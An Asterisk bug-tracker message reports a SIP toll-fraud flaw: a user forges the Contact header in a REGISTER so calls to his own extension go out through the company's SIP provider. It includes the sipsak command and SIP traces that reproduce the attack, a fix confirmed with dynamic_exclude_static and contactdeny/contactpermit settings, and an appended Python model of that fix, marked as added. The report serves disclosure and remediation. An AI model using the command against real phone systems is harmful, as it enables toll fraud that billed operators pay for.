[asterisk-bugs] [Asterisk 0011776]: [authentication] in sip.conf: A malicious "Contact" header in REGISTER can get free calls through SIP provider

Asterisk Bug Tracker noreply at bugs.digium.com
Fri Sep 12 13:34:17 CDT 2008


A NOTE has been added to this issue. 
====================================================================== 
http://bugs.digium.com/view.php?id=11776 
====================================================================== 
Reported By:                ibc
Assigned To:                blitzrage
====================================================================== 
Project:                    Asterisk
Issue ID:                   11776
Category:                   Channels/chan_sip/Registration
Reproducibility:            always
Severity:                   minor
Priority:                   normal
Status:                     ready for testing
Asterisk Version:           1.4.17 
SVN Branch (only for SVN checkouts, not tarball releases): N/A 
SVN Revision (number only!):  
Disclaimer on File?:        N/A 
Request Review:              
====================================================================== 
Date Submitted:             2008-01-16 05:57 CST
Last Modified:              2008-09-12 13:34 CDT
====================================================================== 
Summary:                    [authentication] in sip.conf: A malicious "Contact"
header in REGISTER can get free calls through SIP provider
Description: 
Hi, a malicious "Contact" header can be very damaging, as I explain in the
following example:


Suppose our Asterisk has configured a SIP provider "sip_provider" with
"realm=sip_provider.com" and a SIP local phone "2001" who is not allowed to
do calls through "sip_provider":


sip.conf:
------------------------------------------
[authentication]
auth = client_number:client_password@sip_provider.com

[sip_provider]
type = peer
host = sip_provider.com

[2001] ; local phone
type = friend
secret = 1234
context = from_phone
------------------------------------------


extensions.conf:
------------------------------------------
[from_phone]
; Just allow to do test calls
exten => 500,1,Echo
exten => 501,1,PlayBack(demo-congrats)
exten => _200X,1,Dial(SIP/${EXTEN}) ; call to himself and other local phones
------------------------------------------


Note that for "sip_provider", instead of using "secret" and "username"
in the peer definition we have defined an "auth" in the [authentication]
section. AFAIK this is perfectly valid.

Note too that "phone" is only allowed to call 500, 501 and 200X (so by
calling 2001 he would call himself).



Now, because the owner of the 2001 phone is angry, he decides to hack the
enterprise PBX by doing this:

  sipsak -U -C "sip:0034999000111@sip_provider.com:5060" -a "1234" -s sip:2001@asterisk_ip

This will cause a malicious registration in Asterisk for the AoR
"sip:2001@asterisk_ip".

Now this person calls himself by dialing the 2001 extension:

- Asterisk, executing the dialplan, will then do:
    Dial(SIP/2001)

- This will cause an INVITE to the sip_provider, and replies like:

* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111@sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk@asterisk_ip>
To: <sip:0034999000111@sip_provider.com:5060>


* sip_provider.com -> asterisk_ip
SIP/2.0 407 Proxy Authentication Required
Proxy-Authenticate: Digest algorithm=MD5, realm="sip_provider.com", nonce="1748d3"


* asterisk_ip -> sip_provider.com
INVITE sip:0034999000111@sip_provider.com:5060 SIP/2.0
From: "asterisk" <sip:asterisk@asterisk_ip>
To: <sip:0034999000111@sip_provider.com:5060>
Proxy-Authorization: Digest username="client_number", realm="sip_provider.com", algorithm=MD5, uri="sip:0034999000111@sip_provider.com:5060", nonce="1748d3", response="70d491d8998a961dc"


* sip_provider.com -> asterisk_ip
183 Session Progress

ooohhhhhh !!!


So the malicious user has made a PSTN call for free!
====================================================================== 

---------------------------------------------------------------------- 
 (0092443) blitzrage (administrator) - 2008-09-12 13:34
 http://bugs.digium.com/view.php?id=11776#c92443 
---------------------------------------------------------------------- 
OK, from what I can tell this is all working now!

[Sep 12 10:34:00] WARNING[4158]: chan_sip.c:8276 parse_register_contact: Host '192.168.128.106' disallowed by rule
[Sep 12 10:34:00] WARNING[4158]: chan_sip.c:8800 register_verify: Failed to parse contact info
    -- Registered SIP '2001' at 192.168.128.100 port 57664 expires 3600
[Sep 12 10:34:10] NOTICE[4158]: chan_sip.c:15473 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 2001
    -- Executing [2001@bug11776:1] Dial("SIP/2001-120964e0", "SIP/2001") in new stack
    -- Called 2001
    -- SIP/2001-120a01b0 is ringing
  == Spawn extension (bug11776, 2001, 1) exited non-zero on 'SIP/2001-120964e0'


sip.conf
--------

[general]
dynamic_exclude_static = yes   ; Disallow all dynamic hosts from registering
                               ; as any IP address used for statically defined
                               ; hosts.  This helps avoid the configuration
                               ; error of allowing your users to register at
                               ; the same address as a SIP provider.

contactdeny=0.0.0.0/0.0.0.0                    ; Use contactpermit and contactdeny to
contactpermit=192.168.128.100/255.255.255.255  ; restrict at what IPs your users may
                                               ; register their phones.




So I restricted chan_sip to only allow my softphone from my laptop to
register. When I tried to perform the register to forward the call to
192.168.128.106 (my 'service provider'), I ended up with the denial message.

Calls worked as expected when I registered with the softphone from the
allowed IP address.

So from what I can tell, this is all working now! 
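The two checks that the note above exercises, the contactdeny/contactpermit ACL on the registering Contact host and dynamic_exclude_static (a registering peer may not claim the address of a statically defined host), modelled as an added Python example. This is not chan_sip's code and not from the tracker: the static peer table, the constructed DNS table, the "last matching rule wins, no match means permit" ACL reading, and the function names are assumptions of the model. It reproduces both outcomes from the note: the softphone at 192.168.128.100 registers, while a Contact pointing at the provider's address is rejected with a "disallowed by rule" reason; with no policy configured (the reporter's original sip.conf) the same Contact would be accepted.

```python
"""Model of a REGISTER Contact-host policy (added example, not Asterisk code)."""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed topology borrowed from the note: the provider is a statically
# defined host, the softphone is a dynamic (registering) peer at .100.
STATIC_PEER_HOSTS: Dict[str, str] = {"sip_provider": "192.168.128.106"}
# Constructed resolver table so the example runs offline.
FAKE_DNS: Dict[str, str] = {"sip_provider.com": "192.168.128.106"}


def parse_contact_host(contact: str) -> Tuple[str, int]:
    """Return (host, port) from a Contact header value such as
    '<sip:0034999000111@sip_provider.com:5060>;expires=3600'."""
    value = contact.strip()
    if value.startswith("<"):
        value = value[1:value.index(">")]
    uri = value.split(";", 1)[0]            # drop header/URI parameters
    scheme, sep, rest = uri.partition(":")
    if scheme not in ("sip", "sips") or not sep:
        raise ValueError(f"not a SIP URI: {contact!r}")
    if "@" in rest:                         # strip the user part
        rest = rest.rsplit("@", 1)[1]
    host, _, port = rest.partition(":")
    if not host:
        raise ValueError(f"empty host in Contact: {contact!r}")
    return host, int(port) if port else 5060


def resolve(host: str, dns: Dict[str, str]) -> str:
    """IP literals pass through; names are looked up in the constructed table."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        if host not in dns:
            raise ValueError(f"cannot resolve {host!r}")
        return dns[host]


@dataclass
class RegisterPolicy:
    # (sense, network) in sip.conf order, mirroring contactdeny=/contactpermit=
    rules: List[Tuple[str, ipaddress.IPv4Network]] = field(default_factory=list)
    dynamic_exclude_static: bool = False

    def add(self, sense: str, rule: str) -> "RegisterPolicy":
        """Accept Asterisk's 'addr/dotted-mask' or 'addr/prefix' syntax."""
        addr, _, mask = rule.partition("/")
        net = ipaddress.ip_network(f"{addr}/{mask or '32'}", strict=False)
        self.rules.append((sense, net))
        return self

    def verify(self, contact: str, dns: Dict[str, str] = FAKE_DNS) -> Tuple[bool, str]:
        """Decide whether a REGISTER with this Contact may be stored."""
        host, _port = parse_contact_host(contact)
        ip = ipaddress.ip_address(resolve(host, dns))
        # dynamic_exclude_static: a registering peer may never take the
        # address of a statically defined host (here, the SIP provider).
        if self.dynamic_exclude_static:
            for name, static_ip in STATIC_PEER_HOSTS.items():
                if ip == ipaddress.ip_address(static_ip):
                    return False, f"Host '{ip}' disallowed: address of static peer [{name}]"
        # contactdeny/contactpermit: evaluated in order, last match wins,
        # no match means permit (assumed reading of the ACL semantics).
        verdict = "permit"
        for sense, net in self.rules:
            if ip in net:
                verdict = sense
        if verdict == "deny":
            return False, f"Host '{ip}' disallowed by rule"
        return True, f"Registered contact at {ip}"


def hardened_policy() -> RegisterPolicy:
    """The sip.conf [general] settings from the note, as a policy object."""
    return (RegisterPolicy(dynamic_exclude_static=True)
            .add("deny", "0.0.0.0/0.0.0.0")
            .add("permit", "192.168.128.100/255.255.255.255"))


if __name__ == "__main__":
    for policy_name, policy in (("open", RegisterPolicy()), ("hardened", hardened_policy())):
        for contact in ("<sip:2001@192.168.128.100:57664>",
                        "<sip:0034999000111@sip_provider.com:5060>"):
            print(policy_name, contact, policy.verify(contact))
```

The order of the two checks matters for the log you see: the static-host exclusion is tested first so that a Contact aimed at the provider is refused even on an installation that never configured contactdeny/contactpermit, which is the case the original report describes.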

Issue History 
Date Modified    Username       Field                    Change               
====================================================================== 
2008-09-12 13:34 blitzrage      Note Added: 0092443                          
======================================================================